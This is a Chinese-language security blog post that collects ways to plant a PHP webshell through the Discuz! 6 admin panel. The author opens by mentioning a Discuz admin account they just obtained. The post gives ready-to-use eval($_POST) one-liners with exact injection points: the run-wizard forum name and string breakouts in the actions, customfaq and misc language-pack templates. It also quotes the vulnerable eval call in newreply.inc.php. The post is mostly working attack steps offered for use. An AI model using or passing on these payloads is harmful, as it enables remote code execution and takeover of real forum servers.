Discuz! 6 后台拿Shell的方法

2010, January 9, 4:07 PM. 漏洞集研
Submitted by admin

刚刚拿了个discuz的管理员,顺便找了下这个拿shell的方法保存一下!

-----------------

====================

1:
http://127.0.0.1/admincp.php?action=runwizard&frames=yes
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
<?php eval($_POST[cmd]);?>
后台webshell地址:http://127.0.0.1/forumdata/logs/runwizardlog.php    


2:后台模板管理--默认模板套系--详情
templates/default/actions.lang.php
jhackj\\');eval($_POST[cmd])?>;//is    

 

3:

进入【版块】-【模板管理】,
在【默认模板】后面点击【详情】,在【Discuz!语言包】下面点击【actions】后的【编辑】,拉到最后面,在【guest】里面把

【游客】
改为 游客\\\\\\\\');eval($_POST[c]);echo (""//

 

文章作者:Ryat (lib3r3t)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

注:文章首发狼族(www.wolvez.org),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。

如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:

include/newreply.inc.php 107行:
复制内容到剪贴板
代码:
eval("\$language[&#39;post_reply_quote&#39;] = \"$language[post_reply_quote]\";");
呵呵,一个天然的后门:)
PS:还有几个编辑模板的地方可以利用,和第二种方法类似。
 
Tags: discuz

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Discuz!X2.5 Release 20120407 Getshell 0day (浏览: 22639, 评论: 0)
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22315, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16909, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14465, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 46381, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50185, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23270, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15976, 评论: 0)
dz~~~~马后炮 (浏览: 10679, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11779, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):